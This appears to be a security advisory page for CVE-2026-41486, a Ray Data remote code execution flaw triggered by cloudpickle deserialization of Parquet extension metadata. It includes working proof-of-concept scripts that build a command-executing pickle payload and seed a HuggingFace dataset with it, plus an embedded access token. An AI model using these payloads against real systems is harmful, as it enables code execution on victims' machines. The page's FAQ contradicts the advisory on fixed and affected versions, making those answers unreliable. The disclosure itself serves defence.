CVE-2026-41486: Ray: Remote Code Execution via Parquet Arrow Extension Type Deserialization

Published Apr 24, 2026
·
Updated

Remote Code Execution via Parquet Arrow Extension Type Deserialization

Summary

Ray Data registers custom Arrow extension types (ray.data.arrowtensor, ray.data.arrowtensorv2, ray.data.arrowvariableshapedtensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls arrowextdeserialize on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read.

In May 2024, Ray fixed a related vulnerability in PyExtensionType-based extension types (issue #41314, PR #45084). In July 2025, PR #54831 introduced cloudpickle.loads() into the replacement extension types' deserialization path, reintroducing the same class of vulnerability.

Note: Source links in this report are pinned to the Ray 2.54.0 release commit (48bd1f8fa4) for stable line references. We also re-verified the same vulnerable code paths on current master as of March 17, 2026.

Details

Extension type registration

Ray Data registers three Arrow extension types globally in PyArrow:

python python/ray/data/internal/tensorextensions/arrow.py:1603-1605 pa.registerextensiontype(ArrowTensorType((0,), pa.int64())) pa.registerextensiontype(ArrowTensorTypeV2((0,), pa.int64())) pa.registerextensiontype(ArrowVariableShapedTensorType(pa.int64(), 0))

Registration happens at module load time (init.py:94-95), and any use of ray.data triggers it. Once registered, PyArrow automatically calls arrowextdeserialize whenever it encounters these extension type names in any Parquet file's schema, including files from untrusted sources.

The code path to cloudpickle.loads()

All three extension types inherit from ArrowExtensionSerializeDeserializeCache, whose arrowextdeserialize method (arrow.py:176-179) delegates to subclass methods that ultimately call deserializewithfallback():

python python/ray/data/internal/tensorextensions/arrow.py:84-96 def deserializewithfallback(serialized: bytes, fieldname: str = "data"): """Deserialize data with cloudpickle first, fallback to JSON.""" try: # Try cloudpickle first (new format) return cloudpickle.loads(serialized) # <-- arbitrary code execution except Exception: # Fallback to JSON format (legacy) try: return json.loads(serialized) except json.JSONDecodeError: raise ValueError( f"Unable to deserialize {fieldname} from {type(serialized)}" )

The serialized bytes come directly from the Parquet file's field-level metadata (ARROW:extension:metadata) with no validation. cloudpickle.loads() is tried first, meaning a crafted payload will always be executed before the safe JSON fallback is reached.

For ArrowTensorType, the call chain is:

arrowextdeserialize(cls, storagetype, serialized) # arrow.py:176 -> arrowextdeserializecache(serialized, valuetype) # arrow.py:178 -> arrowextdeserializecompute(serialized, valuetype) # arrow.py:652 -> deserializewithfallback(serialized, "shape") # arrow.py:653 -> cloudpickle.loads(serialized) # arrow.py:88 RCE

ArrowTensorTypeV2 (arrow.py:679-680) and ArrowVariableShapedTensorType (arrow.py:1076-1077) follow the same pattern.

Why the existing mitigation doesn't help

After issue #41314, Ray added checkforlegacytensortype() in parquetdatasource.py:146-170 to block the old PyExtensionType-based tensor types:

python python/ray/data/internal/datasource/parquetdatasource.py:146-170 def checkforlegacytensortype(schema): """Check for the legacy tensor extension type and raise an error if found.

Ray Data uses an extension type to represent tensors in Arrow tables. Previously, the extension type extended PyExtensionType. However, this base type can expose users to arbitrary code execution. To prevent this, we don't load the type by default. """ for name, type in zip(schema.names, schema.types): if isinstance(type, pa.UnknownExtensionType) and isinstance( type, pa.PyExtensionType ): raise RuntimeError(...)

This guard checks for PyExtensionType / UnknownExtensionType. It does not check for the currently-registered ray.data.arrowtensor types, which are the ones that call cloudpickle.loads(). Additionally, the check runs after PyArrow has already deserialized the schema, so even if it checked for the current types, the code execution would have already occurred.

Outside Ray's documented threat model

Ray's security documentation states that Ray relies on network isolation and "extensively uses cloudpickle." This vulnerability does not require cluster access. The payload arrives through a Parquet file from cloud storage, a data lake, HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster is vulnerable if it reads a crafted file.

Impact

- Affected versions: Ray 2.49.0 through 2.54.0 (latest release as of March 2026). The vulnerable deserializewithfallback function with cloudpickle.loads() was introduced in commit f6d21db1a4 (PR #54831, July 2025), first released in Ray 2.49.0. - Affected configurations: Any process that uses Ray Data and reads Parquet files. The extension types are registered globally in PyArrow, so all Parquet reads in the process are affected, including ray.data.readparquet(), pyarrow.parquet.readtable(), pandas.readparquet(), etc. - Attacker prerequisites: The attacker must place a crafted Parquet file where a Ray Data pipeline reads it. No authentication or cluster access is required. The Parquet file must contain a column with a ray.data.arrowtensor (or v2, or variable-shaped) extension type name, which makes this a targeted attack against Ray Data users. - CIA impact: Arbitrary command execution as the Ray worker process user, resulting in full server compromise. - Severity: Critical

Attack scenarios

1. HuggingFace datasets: Ray's documentation recommends reading Parquet datasets from HuggingFace using ray.data.readparquet("hf://datasets/...", filesystem=HfFileSystem()). Anyone can create a HuggingFace dataset containing a crafted Parquet file. A tensor column with ray.data.arrowtensor metadata is normal for an ML dataset, as tensor columns are a core Ray Data feature. We verified this scenario end-to-end with a private HuggingFace dataset (see PoC below).

2. Multi-tenant ML platforms: Organizations running shared Ray clusters where multiple teams submit data processing jobs. If one team can write Parquet files to shared storage that another team reads, the writer can execute arbitrary code in the reader's context.

3. Compromised data pipelines: An upstream data producer writes Parquet files with crafted tensor column metadata. The payload survives because standard Parquet tools preserve extension metadata transparently.

PoC

We provide two reproductions: a minimal local PoC and a full end-to-end scenario via HuggingFace.

Prerequisites: Python 3.12+ and uv (curl -LsSf https://astral.sh/uv/install.sh | sh).

PoC 1: Local file

Creates a valid Parquet file with a tensor column whose extension metadata contains a crafted cloudpickle payload. Reading the file with Ray Data triggers code execution during schema parsing.

1. Create the Parquet file:

bash cat > craftparquet.py << 'SCRIPT' import cloudpickle import pyarrow as pa import pyarrow.parquet as pq

COMMAND = "id > /tmp/ray-tensor-rce-proof"

class Trigger: def reduce(self): return (eval, (f"(import('os').system({COMMAND!r}), (1,))[1]",))

storagetype = pa.list(pa.int64()) schema = pa.schema([ pa.field("tensor", storagetype, metadata={ b"ARROW:extension:name": b"ray.data.arrowtensor", b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()), }), pa.field("id", pa.int64()), pa.field("text", pa.string()), ]) table = pa.Table.fromarrays([ pa.array([[1, 2, 3], [4, 5, 6]], type=storagetype), pa.array([1, 2]), pa.array(["hello", "world"]), ], schema=schema) pq.writetable(table, "crafted.parquet") print("Created crafted.parquet") SCRIPT

uv run --with 'cloudpickle,pyarrow' python craftparquet.py

2. Read it with Ray Data:

bash rm -f /tmp/ray-tensor-rce-proof

uv run --with 'ray[data]' python -c " import ray.data ray.data.readparquet('crafted.parquet') "

cat /tmp/ray-tensor-rce-proof Expected: output of 'id' — confirms code execution

PoC 2: End-to-end via HuggingFace

This demonstrates the realistic attack scenario: a crafted Parquet file hosted as a HuggingFace dataset, read by a Ray cluster following Ray's own documentation.

We uploaded a crafted Parquet file to a private HuggingFace dataset at antiproof/parquet-tensor-disclosure. The file looks like a normal ML dataset with tensor, id, and text columns. The read-only token below gives access.

Upload script (for reference, this is how we seeded the dataset):

bash cat > uploaddataset.py << 'SCRIPT' /// script requires-python = ">=3.10" dependencies = ["cloudpickle", "pyarrow", "huggingfacehub"] /// """Upload a crafted Parquet file to a HuggingFace dataset.

Prerequisites: huggingface-cli login (with a write token) Usage: uv run uploaddataset.py <repoid> <command> """ import sys, tempfile from pathlib import Path import cloudpickle, pyarrow as pa, pyarrow.parquet as pq from huggingfacehub import HfApi

def buildparquet(output, command): class Trigger: def reduce(self): return (eval, (f"(import('os').system({command!r}), (1,))[1]",))

storagetype = pa.list(pa.int64()) schema = pa.schema([ pa.field("tensor", storagetype, metadata={ b"ARROW:extension:name": b"ray.data.arrowtensor", b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()), }), pa.field("id", pa.int64()), pa.field("text", pa.string()), ]) table = pa.Table.fromarrays([ pa.array([[1, 2, 3], [4, 5, 6]], type=storagetype), pa.array([1, 2]), pa.array(["hello", "world"]), ], schema=schema) pq.writetable(table, str(output))

repoid, command = sys.argv[1], sys.argv[2] with tempfile.TemporaryDirectory() as tmpdir: parquet = Path(tmpdir) / "train.parquet" buildparquet(parquet, command) HfApi().uploadfile( pathorfileobj=str(parquet), pathinrepo="data/train.parquet", repoid=repoid, repotype="dataset", ) print(f"Uploaded to https://huggingface.co/datasets/{repoid}") SCRIPT

We ran: uv run uploaddataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof'

Reproduce (reads the dataset from HuggingFace, no local files needed):

bash rm -f /tmp/ray-tensor-rce-proof

HFTOKEN=hfVnnQmzxXXdzdHmcGsTgpjvUPsIwkmcFxYn \ uv run --with 'ray[data],huggingfacehub' python -c " import ray.data from huggingfacehub import HfFileSystem

ray.data.readparquet( 'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet', filesystem=HfFileSystem(), ) "

cat /tmp/ray-tensor-rce-proof Expected: output of 'id' — confirms code execution via HuggingFace dataset

The token above is read-only. The dataset is private to prevent unintended exposure.

Suggested fix

The extension metadata stores simple values (a shape tuple like (3, 224, 224) or an ndim integer). These do not require cloudpickle.

1. Replace cloudpickle.loads() in deserializewithfallback() with json.loads(). The tensor shape and ndim are JSON-serializable. For backward compatibility with files written using the current cloudpickle format, gate cloudpickle.loads() behind an opt-in environment variable (following the pattern already established with RAYDATAAUTOLOADPYEXTENSIONTYPE). 2. Serialize new extension type metadata as JSON by default. json.dumps([3, 224, 224]) carries the same information as cloudpickle.dumps((3, 224, 224)), without the code execution risk. 3. Add a security note to readparquet() documentation explaining that Parquet files from untrusted sources can execute arbitrary code when tensor extension types are registered.

Please contact security@antiproof.ai with any questions about this disclosure policy or related security research.

Other sources

Ray is an AI compute engine. From version 2.54.0 to before version 2.55.0, Ray Data registers custom Arrow extension types (ray.data.arrowtensor, ray.data.arrowtensorv2, ray.data.arrowvariableshapedtensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls arrowextdeserialize on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read. This issue has been patched in version 2.55.0.

MITRE

Affected Software

2 affected componentsFixes available
pip/ray>=2.49.0<2.55.0
2.55.0
Anyscale Ray=2.54.0

Event History

Apr 24, 2026
Advisory Published
via GitHub·04:15 PM
Data Sourced
via GitHub·04:15 PM
DescriptionWeaknessAffected Software
May 8, 2026
CVE Published
via MITRE·09:46 PM
Data Sourced
via MITRE·09:46 PM
DescriptionWeakness
Data Sourced
via NVD·10:16 PM
RemedyDescriptionSeverityWeaknessAffected Software
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-41486?

CVE-2026-41486 has a critical severity level due to the potential for remote code execution.

2

How do I fix CVE-2026-41486?

To fix CVE-2026-41486, upgrade to Ray version 2.56.0 or later.

3

What are the affected versions of Ray for CVE-2026-41486?

CVE-2026-41486 affects Ray versions from 2.49.0 to 2.55.0 inclusive.

4

What type of vulnerability is CVE-2026-41486?

CVE-2026-41486 is classified as a remote code execution vulnerability.

5

Which component of Ray is vulnerable in CVE-2026-41486?

The vulnerability in CVE-2026-41486 affects the custom Arrow extension types related to Parquet file deserialization.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203